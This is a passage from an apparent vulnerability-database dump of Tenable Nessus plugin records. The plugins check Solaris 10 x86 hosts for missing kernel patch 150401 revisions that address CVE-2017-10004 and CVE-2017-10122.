flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWos86r\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWperl584core\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWpkcs11kms\", version:\"11.10.0,REV=2011.04.20.04.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWpmu\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWrcmdc\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWsmapi\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWtoo\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWzfskr\", version:\"11.10.0,REV=2006.05.18.01.46\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWzfsr\", version:\"11.10.0,REV=2006.05.18.01.46\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-51\", obsoleted_by:\"\", package:\"SUNWzfsu\", version:\"11.10.0,REV=2006.05.18.01.46\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWarc / SUNWarcr / SUNWbtool / SUNWcakr / SUNWckr / SUNWcpc / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:17:04", "bulletinFamily": "scanner", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.", "modified": "2019-11-02T00:00:00", "id": "SOLARIS10_X86_150401-53.NASL", "href": "https://www.tenable.com/plugins/nessus/108202", "published": "2018-03-12T00:00:00", "title": "Solaris 10 (x86) : 150401-53", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108202);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/22 9:47:14\");\n\n script_cve_id(\"CVE-2017-10004\", \"CVE-2017-10122\");\n\n script_name(english:\"Solaris 10 (x86) : 150401-53\");\n script_summary(english:\"Check for patch 150401-53\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 150401-53\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/150401-53\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 150401-53\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:127981\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142008\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142047\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142333\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:144312\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:144541\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146448\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146809\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146839\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146849\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:147698\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148175\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148232\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148554\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148558\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148678\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148722\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148767\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148876\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149313\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149503\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149617\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149637\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149641\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149643\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149649\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149730\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150116\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150118\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150154\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150162\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150170\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150301\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150385\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150401\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150528\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150628\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150630\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150636\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150757\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150761\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151150\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151426\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWarcr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWbtool\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWcakr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWckr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWcpc\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWcry\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWcryr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWcslr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWdcar\", version:\"11.10.0,REV=2007.06.20.13.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWdtrc\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWdtrp\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWesu\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWfmd\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWfss\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWftdur\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWhermon\", version:\"11.10.0,REV=2007.06.20.13.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWib\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWintgige\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWipoib\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWlxr\", version:\"11.10.0,REV=2007.06.20.13.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWmdb\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWmdbr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWmptsas\", version:\"11.10.0,REV=2009.07.13.23.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWnfsckr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWnfscr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWnfscu\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWnfsskr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWnfssu\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWos86r\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWperl584core\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWpkcs11kms\", version:\"11.10.0,REV=2011.04.20.04.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWpmu\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWrcmdc\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWsmapi\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWtoo\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWzfskr\", version:\"11.10.0,REV=2006.05.18.01.46\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWzfsr\", version:\"11.10.0,REV=2006.05.18.01.46\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-53\", obsoleted_by:\"\", package:\"SUNWzfsu\", version:\"11.10.0,REV=2006.05.18.01.46\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWarc / SUNWarcr / SUNWbtool / SUNWcakr / SUNWckr / SUNWcpc / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:17:04", "bulletinFamily": "scanner", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.", "modified": "2019-11-02T00:00:00", "id": "SOLARIS10_X86_150401-52.NASL", "href": "https://www.tenable.com/plugins/nessus/108201", "published": "2018-03-12T00:00:00", "title": "Solaris 10 (x86) : 150401-52", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108201);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/22 9:47:14\");\n\n script_cve_id(\"CVE-2017-10004\", \"CVE-2017-10122\");\n\n script_name(english:\"Solaris 10 (x86) : 150401-52\");\n script_summary(english:\"Check for patch 150401-52\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 150401-52\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/150401-52\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 150401-52\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:127981\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142008\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142047\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142333\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:144312\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:144541\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146448\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146809\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146839\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146849\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:147698\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148175\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148232\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148554\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148558\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148678\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148722\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148767\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148876\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149313\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149503\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149617\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149637\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149641\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149643\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149649\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149730\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150116\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150118\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150154\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150162\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150170\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150301\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150385\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150401\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150528\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150628\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150630\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150636\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150757\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150761\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151150\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151426\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWarc\", 